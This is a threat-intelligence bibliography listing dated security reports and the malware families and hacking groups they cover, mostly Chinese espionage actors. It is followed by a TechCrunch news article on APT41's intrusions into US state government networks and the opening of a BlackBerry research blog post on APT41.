APT40
BlackTech
BuhTrap
Charming Kitten
CLOCKWORK SPIDER
DOPPEL SPIDER
FIN7
Gamaredon Group
GOBLIN PANDA
MONTY SPIDER
MUSTANG PANDA
NARWHAL SPIDER
NOCTURNAL SPIDER
PINCHY SPIDER
SALTY SPIDER
SCULLY SPIDER
SMOKY SPIDER
Thrip
VENOM SPIDER
VICEROY TIGER
×Select Content2020-03-03
⋅
PWC UK
⋅
PWC UKCyber Threats 2019:A Year in Retrospect KevDroid
MESSAGETAP
magecart
AndroMut
Cobalt Strike
CobInt
Crimson RAT
DNSpionage
Dridex
Dtrack
Emotet
FlawedAmmyy
FlawedGrace
FriedEx
Gandcrab
Get2
GlobeImposter
Grateful POS
ISFB
Kazuar
LockerGoga
Nokki
QakBot
Ramnit
REvil
Rifdoor
RokRAT
Ryuk
shadowhammer
ShadowPad
Shifu
Skipper
StoneDrill
Stuxnet
TrickBot
Winnti
ZeroCleare
APT41
MUSTANG PANDA
Sea Turtle
×Select Content2020-03-02
⋅
Virus Bulletin
⋅
Alex HinchliffePulling the PKPLUG: the adversary playbook for the long-standing espionage activity of a Chinese nation-state adversary HenBox
Farseer
PlugX
Poison Ivy
×Select Content2020-02-21
⋅
ADEO DFIR
⋅
ADEO DFIRAPT10 Threat Analysis Report CHINACHOPPER
HTran
MimiKatz
PlugX
Quasar RAT
×Select Content2020-02-20
⋅
McAfee
⋅
Christiaan Beek,
Darren Fitzpatrick,
Eamonn RyanCSI: Evidence Indicators for Targeted Ransomware Attacks – Part II Cobalt Strike
LockerGoga
Maze
MegaCortex
×Select Content2020-02-19
⋅
FireEye
⋅
FireEyeM-Trends 2020 Cobalt Strike
Grateful POS
LockerGoga
QakBot
TrickBot
×Select Content2020-02-18
⋅
Cisco Talos
⋅
Vanja SvajcerBuilding a bypass with MSBuild Cobalt Strike
GRUNT
MimiKatz
×Select Content2020-02-18
⋅
Trend Micro
⋅
Cedric Pernet,
Daniel Lunghi,
Jamz Yaneza,
Kenney LuUncovering DRBControl: Inside the Cyberespionage Campaign Targeting Gambling Operations Cobalt Strike
HyperBro
PlugX
Trochilus RAT
×Select Content2020-02-17
⋅
Talent-Jump Technologies
⋅
Theo Chen,
Zero ChenCLAMBLING - A New Backdoor Base On Dropbox HyperBro
PlugX
×Select Content2020-02-13
⋅
Qianxin
⋅
Qi Anxin Threat Intelligence CenterAPT Report 2019 Chrysaor
Exodus
Dacls
VPNFilter
DNSRat
Griffon
KopiLuwak
More_eggs
SQLRat
AppleJeus
BONDUPDATER
Agent.BTZ
Anchor
AndroMut
AppleJeus
BOOSTWRITE
Brambul
Carbanak
Cobalt Strike
Dacls
DistTrack
DNSpionage
Dtrack
ELECTRICFISH
FlawedAmmyy
FlawedGrace
Get2
Grateful POS
HOPLIGHT
Imminent Monitor RAT
jason
Joanap
KerrDown
KEYMARBLE
Lambert
LightNeuron
LoJax
MiniDuke
PolyglotDuke
PowerRatankba
Rising Sun
SDBbot
ServHelper
Snatch
Stuxnet
TinyMet
tRat
TrickBot
Volgmer
X-Agent
Zebrocy
×Select Content2020-01-31
⋅
Avira
⋅
Shahab HamzeloofardNew wave of PlugX targets Hong Kong PlugX
×Select Content2020-01-31
⋅
YouTube (Context Information Security)
⋅
ContextisNew AVIVORE threat group – how they operate and managing the risk PlugX
×Select Content2020-01-31
⋅
ESET Research
⋅
Mathieu TartareWinnti Group targeting universities in Hong Kong ShadowPad
Winnti
×Select Content2020-01-29
⋅
nao_sec blog
⋅
nao_secAn Overhead View of the Royal Road BLACKCOFFEE
Cotx RAT
Datper
DDKONG
Derusbi
Icefog
Korlia
NewCore RAT
PLAINTEE
Poison Ivy
Sisfader
×Select Content2020-01-13
⋅
Lab52
⋅
Jagaimo KawaiiAPT27 ZxShell RootKit module updates ZXShell
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksGOLD KINGSWOOD More_eggs
ATMSpitter
Cobalt Strike
CobInt
MimiKatz
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE PRESIDENT CHINACHOPPER
Cobalt Strike
PlugX
MUSTANG PANDA
×Select Content2020-01-01
⋅
FireEye
⋅
Mandiant,
Mitchell Clarke,
Tom HallMandiant IR Grab Bag of Attacker Activity TwoFace
CHINACHOPPER
HyperBro
HyperSSL
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE ATLAS Speculoos
Winnti
ACEHASH
CCleaner Backdoor
CHINACHOPPER
Empire Downloader
HTran
MimiKatz
PlugX
Winnti
APT41
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE OLIVE ANGRYREBEL
PlugX
APT22
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE UNION 9002 RAT
CHINACHOPPER
Enfal
Ghost RAT
HttpBrowser
HyperBro
owaauth
PlugX
Poison Ivy
ZXShell
APT27
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE KEYSTONE 9002 RAT
BLACKCOFFEE
DeputyDog
Derusbi
HiKit
PlugX
Poison Ivy
ZXShell
APT17
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE RIVERSIDE Anel
ChChes
Cobalt Strike
PlugX
Poison Ivy
Quasar RAT
RedLeaves
APT10
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE OVERBROOK Aveo
DDKONG
IsSpace
PLAINTEE
PlugX
Rambo
DragonOK
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksGOLD DUPONT Cobalt Strike
Defray
PyXie
GOLD DUPONT
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE FIRESTONE 9002 RAT
Derusbi
Empire Downloader
PlugX
Poison Ivy
APT19
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksGOLD NIAGARA Bateleur
Griffon
Carbanak
Cobalt Strike
DRIFTPIN
TinyMet
FIN7
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksGOLD KINGSWOOD More_eggs
ATMSpitter
Cobalt Strike
CobInt
MimiKatz
Cobalt
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksTIN WOODLAWN Cobalt Strike
KerrDown
MimiKatz
PHOREAL
RatSnif
Remy
SOUNDBITE
APT32
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE EXPORT APT41
×Select Content2020-01-01
⋅
Dragos
⋅
Joe SlowikThreat Intelligence and the Limits of Malware Analysis Exaramel
Exaramel
Industroyer
Lookback
NjRAT
PlugX
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE MOHAWK AIRBREAK
scanbox
BLACKCOFFEE
CHINACHOPPER
Cobalt Strike
Derusbi
homefry
murkytop
SeDll
APT40
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE WOODLAND PlugX
Zeus
Roaming Tiger
×Select Content2020-01-01
⋅
Secureworks
⋅
SecureWorksBRONZE EXPRESS 9002 RAT
CHINACHOPPER
IsSpace
NewCT
PlugX
smac
APT26
×Select Content2019-12-29
⋅
Secureworks
⋅
CTU Research TeamBRONZE PRESIDENT Targets NGOs PlugX
×Select Content2019-12-17
⋅
Palo Alto Networks Unit 42
⋅
Jen Miller-Osborn,
Mike HarbisonRancor: Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia DDKONG
Derusbi
KHRAT
×Select Content2019-12-12
⋅
Microsoft
⋅
Microsoft Threat Intelligence CenterGALLIUM: Targeting global telecom CHINACHOPPER
Ghost RAT
HTran
MimiKatz
Poison Ivy
GALLIUM
×Select Content2019-12-12
⋅
FireEye
⋅
Chi-en Shen,
Oleg BondarenkoCyber Threat Landscape in Japan – Revealing Threat in the Shadow Cerberus
TSCookie
Cobalt Strike
Dtrack
Emotet
Formbook
IcedID
Icefog
IRONHALO
Loki Password Stealer (PWS)
PandaBanker
PLEAD
poisonplug
TrickBot
BlackTech
×Select Content2019-12-05
⋅
⋅
Github (blackorbird)
⋅
blackorbirdAPT32 Report Cobalt Strike
×Select Content2019-12-05
⋅
Raphael MudgeCobalt Strike 4.0 – Bring Your Own Weaponization Cobalt Strike
×Select Content2019-11-29
⋅
Deloitte
⋅
Thomas ThomasenCyber Threat Intelligence & Incident Response Cobalt Strike
×Select Content2019-11-19
⋅
FireEye
⋅
Kelli Vanderlee,
Nalani FraserAchievement Unlocked: Chinese Cyber Espionage Evolves to Support Higher Level Missions APT1
APT10
APT2
APT26
APT3
APT30
APT41
Naikon
Tonto Team
×Select Content2019-11-19
⋅
FireEye
⋅
Kelli Vanderlee,
Nalani FraserAchievement Unlocked: Chinese Cyber Espionage Evolves to Support Higher Level Missions MESSAGETAP
TSCookie
ACEHASH
CHINACHOPPER
Cobalt Strike
Derusbi
Empire Downloader
Ghost RAT
HIGHNOON
HTran
MimiKatz
NetWire RC
poisonplug
Poison Ivy
pupy
Quasar RAT
ZXShell
×Select Content2019-11-16
⋅
Silas Cutler's Blog
⋅
Silas CutlerFresh PlugX October 2019 PlugX
×Select Content2019-11-11
⋅
Virus Bulletin
⋅
Hiroshi Soeda,
Shusei Tomonaga,
Tomoaki Tani,
Wataru TakahashiAPT cases exploiting vulnerabilities in region‑specific software NodeRAT
Emdivi
PlugX
×Select Content2019-11-05
⋅
tccontre Blog
⋅
tccontreCobaltStrike - beacon.dll : Your No Ordinary MZ Header Cobalt Strike
×Select Content2019-10-31
⋅
FireEye
⋅
Dan Perez,
Raymond Leong,
Tyler DeanMESSAGETAP: Who’s Reading Your Text Messages? MESSAGETAP
×Select Content2019-10-31
⋅
PTSecurity
⋅
PTSecurityCalypso APT: new group attacking state institutions BYEBY
FlyingDutchman
Hussar
PlugX
×Select Content2019-10-22
⋅
Contextis
⋅
ContextisAVIVORE - An overview of Tools, Techniques and Procedures (Whitepaper) PlugX
Avivore
×Select Content2019-10-21
⋅
ESET Research
⋅
Mathieu TartareWinnti Group’s skip‑2.0: A Microsoft SQL Server backdoor LOWKEY
skip-2.0
×Select Content2019-10-15
⋅
FireEye
⋅
Tobias KruegerLOWKEY: Hunting for the Missing Volume Serial ID LOWKEY
poisonplug
×Select Content2019-10-07
⋅
ESET Research
⋅
Marc-Etienne M.Léveillé,
Mathieu TartareCONNECTING THE DOTS: Exposing the arsenal and methods of the Winnti Group LOWKEY
shadowhammer
ShadowPad
×Select Content2019-10-03
⋅
Palo Alto Networks Unit 42
⋅
Alex HinchliffePKPLUG: Chinese Cyber Espionage Group Attacking Asia HenBox
Farseer
PlugX
×Select Content2019-10-03
⋅
ComputerWeekly
⋅
Alex ScroxtonNew threat group behind Airbus cyber attacks, claim researchers PlugX
Avivore
×Select Content2019-09-30
⋅
vmware
⋅
Scott KnightCB Threat Analysis Unit: Technical Analysis of “Crosswalk” CROSSWALK
×Select Content2019-09-23
⋅
MITRE
⋅
MITRE ATT&CKAPT41 Derusbi
MESSAGETAP
Winnti
ASPXSpy
BLACKCOFFEE
CHINACHOPPER
Cobalt Strike
Derusbi
Empire Downloader
Ghost RAT
MimiKatz
NjRAT
PlugX
ShadowPad
Winnti
ZXShell
APT41
×Select Content2019-09-22
⋅
Check Point Research
⋅
Check Point ResearchRancor: The Year of The Phish 8.t Dropper
Cobalt Strike
×Select Content2019-09-19
⋅
MeltX0REmissary Panda APT: Recent infrastructure and RAT analysis ZXShell
×Select Content2019-09-04
⋅
FireEye
⋅
FireEyeAPT41: Double Dragon APT41, a dual espionage and cyber crime operation EASYNIGHT
Winnti
×Select Content2019-08-27
⋅
Cisco Talos
⋅
Paul Rascagnères,
Vanja SvajcerChina Chopper still active 9 years later CHINACHOPPER
×Select Content2019-08-19
⋅
FireEye
⋅
Alex Pennino,
Matt BromileyGAME OVER: Detecting and Stopping an APT41 Operation ACEHASH
CHINACHOPPER
HIGHNOON
×Select Content2019-08-09
⋅
FireEye
⋅
FireEyeDouble Dragon APT41, a dual espionage and cyber crime operation CLASSFON
crackshot
CROSSWALK
GEARSHIFT
HIGHNOON
HIGHNOON.BIN
JUMPALL
poisonplug
Winnti
×Select Content2019-08-08
⋅
Twitter (@MrDanPerez)
⋅
Dan PerezTweet on Winnti and HIGHNOON HIGHNOON
×Select Content2019-08-07
⋅
FireEye
⋅
Chi-en Shen,
Dan Perez,
Fred Plan,
Jacqueline O’Leary,
Nalani Fraser,
Raymond Leong,
Vincent CannonAPT41: A Dual Espionage and Cyber Crime Operation APT41
×Select Content2019-07-24
⋅
Intrusiontruth
⋅
IntrusiontruthAPT17 is run by the Jinan bureau of the Chinese Ministry of State Security BLACKCOFFEE
×Select Content2019-06-25
⋅
Cybereason
⋅
Cybereason NocturnusOPERATION SOFT CELL: A WORLDWIDE CAMPAIGN AGAINST TELECOMMUNICATIONS PROVIDERS CHINACHOPPER
HTran
MimiKatz
Poison Ivy
Operation Soft Cell
×Select Content2019-06-19
⋅
YouTube (44CON Information Security Conference)
⋅
Kevin O’ReillyThe Malware CAPE: Automated Extraction of Configuration and Payloads from Sophisticated Malware PlugX
×Select Content2019-06-13
⋅
Sekoia
⋅
sekoiaHunting and detecting Cobalt Strike Cobalt Strike
×Select Content2019-06-04
⋅
Bitdefender
⋅
BitdefenderAn APT Blueprint: Gaining New Visibility into Financial Threats More_eggs
Cobalt Strike
×Select Content2019-06-03
⋅
FireEye
⋅
Chi-en ShenInto the Fog - The Return of ICEFOG APT Icefog
PlugX
Sarhust
×Select Content2019-05-28
⋅
Palo Alto Networks Unit 42
⋅
Robert Falcone,
Tom LancasterEmissary Panda Attacks Middle East Government Sharepoint Servers CHINACHOPPER
HyperSSL
×Select Content2019-05-24
⋅
Fortinet
⋅
Ben HunterUncovering new Activity by APT10 PlugX
Quasar RAT
×Select Content2019-05-17
⋅
Bleeping Computer
⋅
Sergiu GatlanTeamViewer Confirms Undisclosed Breach From 2016 APT41
×Select Content2019-05-15
⋅
Chronicle
⋅
Juan Andrés Guerrero-Saade,
Silas CutlerWinnti: More than just Windows and Gates Winnti
APT41
×Select Content2019-05-08
⋅
Verizon Communications Inc.
⋅
Verizon Communications Inc.2019 Data Breach Investigations Report BlackEnergy
Cobalt Strike
DanaBot
Gandcrab
GreyEnergy
Mirai
Olympic Destroyer
SamSam
×Select Content2019-04-24
⋅
Weixin
⋅
Tencent"Sea Lotus" APT organization's attack techniques against China in the first quarter of 2019 revealed Cobalt Strike
SOUNDBITE
×Select Content2019-04-23
⋅
Kaspersky Labs
⋅
AMR,
GReATOperation ShadowHammer: a high-profile supply chain attack shadowhammer
ShadowPad
×Select Content2019-04-22
⋅
Trend Micro
⋅
Mohamad MokbelC/C++ Runtime Library Code Tampering in Supply Chain shadowhammer
ShadowPad
Winnti
×Select Content2019-04-15
⋅
PenTestPartners
⋅
Neil LinesCobalt Strike. Walkthrough for Red Teamers Cobalt Strike
×Select Content2019-04-04
⋅
Deutsche Welle
⋅
Deutsche WelleBayer points finger at Wicked Panda in cyberattack APT41
×Select Content2019-04-01
⋅
⋅
Macnica Networks
⋅
Macnica NetworksOceanLotus Attack on Southeast Asian Automotive Industry CACTUSTORCH
Cobalt Strike
×Select Content2019-04-01
⋅
⋅
Macnica Networks
⋅
Macnica NetworksTrends in Cyber Espionage Targeting Japan 2nd Half of 2018 Anel
Cobalt Strike
Datper
PLEAD
Quasar RAT
RedLeaves
taidoor
Zebrocy
×Select Content2019-03-24
⋅
One Night in Norfolk
⋅
Kevin PerlowJEShell: An OceanLotus (APT32) Backdoor Cobalt Strike
KerrDown
×Select Content2019-03-19
⋅
NSHC
⋅
ThreatRecon TeamSectorM04 Targeting Singapore – An Analysis PlugX
Termite
×Select Content2019-03-11
⋅
ESET Research
⋅
Marc-Etienne M.LéveilléGaming industry still in the scope of attackers in Asia APT41
×Select Content2019-02-27
⋅
Secureworks
⋅
CTU Research TeamA Peek into BRONZE UNION’s Toolbox Ghost RAT
HyperBro
ZXShell
×Select Content2019-02-27
⋅
Morphisec
⋅
Alon Groisman,
Michael GorelikNew Global Cyber Attack on Point of Sale Sytem Cobalt Strike
×Select Content2019-02-26
⋅
Fox-IT
⋅
Fox ITIdentifying Cobalt Strike team servers in the wild Cobalt Strike
×Select Content2019-01-01
⋅
MITRE
⋅
MITRE ATT&CKGroup description: Winnti Group APT41
×Select Content2019-01-01
⋅
Virus Bulletin
⋅
Bowen Pan,
Lion GuA vine climbing over the Great Firewall: A long-term attack against China Poison Ivy
ZXShell
×Select Content2019-01-01
⋅
MITRE
⋅
MITRE ATT&CKTool description: BLACKCOFFEE BLACKCOFFEE
×Select Content2019-01-01
⋅
MITRE
⋅
MITRE ATT&CKTool description: China Chopper CHINACHOPPER
×Select Content2018-12-24
⋅
Twitter (@MrDanPerez)
⋅
Dan PerezTweet on hashes for CROSSWALK CROSSWALK
×Select Content2018-12-14
⋅
Australian Cyber Security Centre
⋅
ASDInvestigationreport: Compromise of an Australian companyvia their Managed Service Provider PlugX
RedLeaves
×Select Content2018-11-19
⋅
FireEye
⋅
Andrew Thompson,
Ben Withnell,
Jonathan Leathery,
Matthew Dunwoody,
Michael Matonis,
Nick CarrNot So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign Cobalt Strike
×Select Content2018-11-18
⋅
Stranded on Pylos Blog
⋅
JoeCozyBear – In from the Cold? Cobalt Strike
APT29
×Select Content2018-10-01
⋅
⋅
Macnica Networks
⋅
Macnica NetworksTrends in cyber espionage (targeted attacks) targeting Japan | First half of 2018 Anel
Cobalt Strike
Datper
FlawedAmmyy
Quasar RAT
RedLeaves
taidoor
Winnti
xxmm
×Select Content2018-10-01
⋅
FireEye
⋅
Katie Nickels,
Regina ElwellATT&CKing FIN7 Bateleur
BELLHOP
Griffon
ANTAK
POWERPIPE
POWERSOURCE
HALFBAKED
BABYMETAL
Carbanak
Cobalt Strike
DNSMessenger
DRIFTPIN
PILLOWMINT
SocksBot
×Select Content2018-10-01
⋅
Group-IB
⋅
Group-IBHi-Tech Crime Trends 2018 BackSwap
Cobalt Strike
Cutlet
Meterpreter
×Select Content2018-08-21
⋅
Trend Micro
⋅
Jaromír Hořejší,
Joseph C Chen,
Kawabata Kohei,
Kenney LuOperation Red Signature Targets South Korean Companies 9002 RAT
PlugX
×Select Content2018-08-03
⋅
JPCERT/CC
⋅
Takuya Endo,
Yukako UchidaVolatility Plugin for Detecting Cobalt Strike Beacon Cobalt Strike
×Select Content2018-07-31
⋅
Medium Sebdraven
⋅
Sébastien LarinierMalicious document targets Vietnamese officials 8.t Dropper
PlugX
1937CN
×Select Content2018-07-31
⋅
Github (JPCERTCC)
⋅
JPCERT/CCScanner for CobaltStrike Cobalt Strike
×Select Content2018-07-26
⋅
CrowdStrike
⋅
Adam MeyersMeet CrowdStrike’s Adversary of the Month for July: WICKED SPIDER APT41
×Select Content2018-05-21
⋅
⋅
LAC
⋅
Yoshihiro IshikawaConfirmed new attacks by APT attacker group menuPass (APT10) Cobalt Strike
×Select Content2018-05-09
⋅
COUNT UPON SECURITY
⋅
Luis RochaMalware Analysis - PlugX - Part 2 PlugX
×Select Content2018-05-03
⋅
ProtectWise
⋅
Tom HegelBurning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers APT41
×Select Content2018-03-16
⋅
FireEye
⋅
FireEyeSuspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries badflick
BLACKCOFFEE
CHINACHOPPER
homefry
murkytop
SeDll
APT40
×Select Content2018-03-13
⋅
Kaspersky Labs
⋅
Denis Makrushin,
Yury NamestnikovTime of death? A therapeutic postmortem of connected medicine PlugX
×Select Content2018-02-04
⋅
COUNT UPON SECURITY
⋅
Luis RochaMALWARE ANALYSIS – PLUGX PlugX
×Select Content2017-12-20
⋅
CrowdStrike
⋅
Adam KozyAn End to “Smash-and-Grab” and a Move to More Targeted Approaches CHINACHOPPER
×Select Content2017-12-18
⋅
⋅
LAC
⋅
Yoshihiro IshikawaRelationship between PlugX and attacker group "DragonOK" PlugX
×Select Content2017-08-15
⋅
Kaspersky Labs
⋅
GReATShadowPad in corporate networks ShadowPad
×Select Content2017-06-27
⋅
Palo Alto Networks Unit 42
⋅
Esmid Idrizovic,
Tom LancasterParanoid PlugX PlugX
×Select Content2017-06-06
⋅
FireEye
⋅
Ian AhlPrivileges and Credentials: Phished at the Request of Counsel Cobalt Strike
×Select Content2017-06-06
⋅
Mandiant
⋅
Ian AhlPrivileges and Credentials: Phished at the Request of Counsel Cobalt Strike
APT19
×Select Content2017-05-31
⋅
MITRE
⋅
MITRE ATT&CKAxiom Derusbi
9002 RAT
BLACKCOFFEE
Derusbi
Ghost RAT
HiKit
PlugX
ZXShell
APT17
×Select Content2017-05-31
⋅
MITRE
⋅
MITRE ATT&CKAPT17 BLACKCOFFEE
APT17
×Select Content2017-04-27
⋅
US-CERT
⋅
US-CERTAlert (TA17-117A): Intrusions Affecting Multiple Victims Across Multiple Sectors PlugX
RedLeaves
×Select Content2017-04-26
⋅
Youtube (Kaspersky)
⋅
KasperskyChina's Evolving Cyber Operations: A Look into APT19's Shift in Tactics Cobalt Strike
APT19
×Select Content2017-04-03
⋅
JPCERT/CC
⋅
Shusei TomonagaRedLeaves - Malware Based on Open Source RAT PlugX
RedLeaves
Trochilus RAT
×Select Content2017-04-01
⋅
PricewaterhouseCoopers
⋅
PricewaterhouseCoopersOperation Cloud Hopper: Technical Annex ChChes
PlugX
Quasar RAT
RedLeaves
Trochilus RAT
×Select Content2017-03-22
⋅
Trend Micro
⋅
Cedric PernetWinnti Abuses GitHub for C&C Communications EASYNIGHT
APT41
×Select Content2017-02-21
⋅
JPCERT/CC
⋅
Shusei TomonagaPlugX + Poison Ivy = PlugIvy? - PlugX Integrating Poison Ivy’s Code PlugX
×Select Content2017-02-13
⋅
RSA
⋅
RSA ResearchKINGSLAYER – A SUPPLY CHAIN ATTACK CodeKey
PlugX
×Select Content2017-01-25
⋅
Microsoft
⋅
Microsoft Defender ATP Research TeamDetecting threat actors in recent German industrial attacks with Windows Defender ATP APT41
×Select Content2016-12-08
⋅
Deutsche Welle
⋅
Deutsche WelleThyssenkrupp victim of cyber attack APT41
×Select Content2016-10-28
⋅
Github (smb01)
⋅
smb01zxshell repository ZXShell
×Select Content2016-10-11
⋅
Symantec
⋅
Symantec Security ResponseOdinaff: New Trojan used in high level financial attacks Cobalt Strike
KLRD
MimiKatz
Odinaff
×Select Content2016-08-25
⋅
Malwarebytes
⋅
Malwarebytes LabsUnpacking the spyware disguised as antivirus PlugX
×Select Content2016-06-13
⋅
⋅
Macnica Networks
⋅
Macnica NetworksSurvey of the actual situation of the large-scale cyber spy activity that hit Japan | 1st edition Emdivi
PlugX
×Select Content2016-05-03
⋅
William ShowalterA Universal Windows Bootkit APT41
×Select Content2016-03-02
⋅
RSA Conference
⋅
Vanja SvajcerDissecting Derusbi Derusbi
×Select Content2016-01-22
⋅
RSA Link
⋅
Norton SantosPlugX APT Malware PlugX
×Select Content2015-12-15
⋅
Airbus Defence & Space
⋅
Fabien PerigaudNewcomers in the Derusbi family Derusbi
×Select Content2015-10-08
⋅
Virus Bulletin
⋅
Eric Leung,
Micky Pun,
Neo TanCatching the silent whisper: Understanding the Derusbi family tree Derusbi
×Select Content2015-08-01
⋅
Arbor Networks
⋅
ASERT TeamUncovering the Seven Pointed Dagger 9002 RAT
EvilGrab
PlugX
Trochilus RAT
APT9
×Select Content2015-06-22
⋅
Kaspersky Labs
⋅
Dmitry TarakanovGames are over: Winnti is now targeting pharmaceutical companies Winnti
APT41
×Select Content2015-05-18
⋅
⋅
Tetsuji TanigawaTT Malware Log BLACKCOFFEE
×Select Content2015-05-01
⋅
FireEye
⋅
FireEyeHIDING IN PLAIN SIGHT: FIREEYE AND MICROSOFT EXPOSE OBFUSCATION TACTIC BLACKCOFFEE
×Select Content2015-04-14
⋅
Youtube (Kaspersky)
⋅
Kris McConkeyFollowing APT OpSec failures BLACKCOFFEE
Mangzamel
APT17
×Select Content2015-02-27
⋅
ThreatConnect
⋅
ThreatConnect Research TeamThe Anthem Hack: All Roads Lead to China Derusbi
×Select Content2015-02-06
⋅
CrowdStrike
⋅
CrowdStrikeCrowdStrike Global Threat Intel Report 2014 BlackPOS
CryptoLocker
Derusbi
Elise
Enfal
EvilGrab
Gameover P2P
HttpBrowser
Medusa
Mirage
Naikon
NetTraveler
pirpi
PlugX
Poison Ivy
Sakula RAT
Sinowal
sykipot
taidoor
×Select Content2015-01-29
⋅
JPCERT/CC
⋅
Shusei TomonagaAnalysis of a Recent PlugX Variant - “P2P PlugX” PlugX
×Select Content2014-11-01
⋅
Novetta
⋅
NovettaZoxPNG Analysis BLACKCOFFEE
×Select Content2014-10-28
⋅
Cisco
⋅
Alain Zidouemba,
Andrea Allievi,
Douglas Goddard,
Shaun HurleyThreat Spotlight: Group 72, Opening the ZxShell ZXShell
×Select Content2014-10-28
⋅
Novetta
⋅
NovettaDerusbi (Server Variant) Analysis Derusbi
×Select Content2014-06-27
⋅
SophosLabs
⋅
Gabor SzappanosPlugX - The Next Generation PlugX
×Select Content2014-06-10
⋅
FireEye
⋅
Mike ScottClandestine Fox, Part Deux PlugX
×Select Content2014-01-06
⋅
Airbus
⋅
Fabien PerigaudPlugX: some uncovered points PlugX
×Select Content2014-01-01
⋅
RSA
⋅
RSA ResearchRSA Incident Response: Emerging Threat Profile Shell_Crew Derusbi
×Select Content2013-08-07
⋅
FireEye
⋅
Dennis Hanzlik,
Ian Ahl,
Tony LeeBreaking Down the China Chopper Web Shell - Part I CHINACHOPPER
×Select Content2013-04-11
⋅
Kaspersky Labs
⋅
GReATWinnti. More than just a game APT41
×Select Content2013-04-11
⋅
Kaspersky Labs
⋅
GReATWinnti FAQ. More Than Just a Game APT41
×Select Content2013-03-29
⋅
Computer Incident Response Center Luxembourg
⋅
CIRCLAnalysis Report (TLP:WHITE) Analysis of a PlugX variant (PlugX version 7.0) PlugX
×Select Content2013-03-26
⋅
Contextis
⋅
Kevin O’ReillyPlugX–Payload Extraction PlugX
×Select Content2013-02-27
⋅
Trend Micro
⋅
Abraham CambaBKDR_RARSTONE: New RAT to Watch Out For PlugX
Naikon
×Select Content2012-02-10
⋅
tracker.h3x.eu
⋅
Malware Corpus TrackerInfo for Family: plugx PlugX
×Select Content2012-01-01
⋅
Cobalt Strike
⋅
Cobalt StrikeCobalt Strike Website Cobalt Strike
Credits: MISP ProjectPropose Change of Library Entry×URLTitleAuthorsLanguageDate
Please use YYYY-MM-DD, YYYY-MM, or YYYY.
Organization (optional)Referenced families (optional)Select families...Comment
Add additional information to explain your proposal.
Your suggestion will be reviewed before being published.
Thank you for contributing!
CancelSubmitImpressum
Datenschutzerklärung
China-backed APT41 compromised 'at least' six US state governments | TechCrunch
China-backed APT41 compromised 'at least' six US state governments | TechCrunch
TechCrunch
plus-bold
TechCrunch
Open Navigation
TechCrunch
China-backed APT41 compromised ‘at least’ six US state governments
Carly Page
2 years
The prolific China APT41 hacking group, known for carrying out espionage in parallel with financially motivated operations, has compromised multiple U.S. state government networks, according to cybersecurity giant Mandiant.
The group — seemingly undeterred by U.S. indictments against five APT41 members in 2020 — conducted a months-long campaign during which it targeted and successfully breached at least six U.S. state networks, all of which have been notified by Mandiant but were not named.
Between May 2021 and February 2022, the hacking group used vulnerable internet-facing web applications to gain an initial foothold into state networks. This included exploiting a zero-day vulnerability in a software application called USAHerds, used by 18 states for animal health management, and the now-infamous so-called Log4Shell vulnerability in Apache Log4j, a ubiquitous Java logging library.
Mandiant said APT41 began exploiting Log4Shell within hours of the Apache Foundation publicly sounding the alarm about the vulnerability in December 2021, which led to the compromise of two U.S. state government networks and other targets in the insurance and telecoms industries. After gaining that foothold on the network, APT41 went on to perform “extensive” credential collection.
The investigation also uncovered a variety of new techniques, evasion methods and capabilities used by APT41. In one instance after APT41 gained access to a network via SQL injection vulnerability in a proprietary web application — activity that was contained by Mandiant — APT41 came back two weeks later to recompromise the network with a brand new zero-day exploit. The group also tailored its malware to their victim’s environments and frequently updated the encoded data on a specific forum post, enabling the malware to receive instructions from the attackers’ command and control server.
Though Mandiant said it saw evidence of the hackers exfiltrating personally identifiable information that’s typically consistent with an espionage operation, the goal of the campaign remains unclear — but whatever the group is after must be of high value.
Geoff Ackerman, principal threat analyst at Mandiant, said that while the world is focused on the potential of Russian cyber threats in the wake of the invasion of Ukraine, this investigation is a reminder that other major threat actors around the world are continuing their operations as usual.
“We cannot allow other cyber activity to fall to the wayside, especially given our observations that this campaign from APT41, one of the most prolific threat actors around, continues to this day,” said Ackerman. “APT41 is truly a persistent threat, and this recent campaign is another reminder that state-level systems in the United States are under unrelenting pressure from nation-state actors like China, as well as Russia.”
Justice Department charges five Chinese members of APT41 over cyberattacks on US companies
Drawing a Dragon: Connecting the Dots to Find APT41
Drawing a Dragon: Connecting the Dots to Find APT41
Skip Navigation
BlackBerry Logo
Cybersecurity
Automotive & IOT
Critical Communications
Inside BlackBerry
×
BlackBerry Blog
BlackBerry Blog
Drawing a Dragon: Connecting the Dots to Find APT41
Drawing a Dragon: Connecting the Dots to Find APT41
RESEARCH & INTELLIGENCE / 10.05.21 /
The BlackBerry Research & Intelligence Team
Share on Twitter
Share on Facebook
Share on Linked In
Executive Summary
The BlackBerry Research & Intelligence Team recently connected seemingly disparate malware campaigns, which began with an unusual Cobalt Strike configuration that was first included in a blog post published the same month as COVID-19 lockdowns began in Europe and the U.S. What we found led us through a malicious infrastructure that had been partially documented in articles by several other research organizations.
The image we uncovered was that of a state-sponsored campaign that plays on people’s hopes for a swift end to the pandemic as a lure to entrap its victims. And once on a user’s machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic.
Introduction
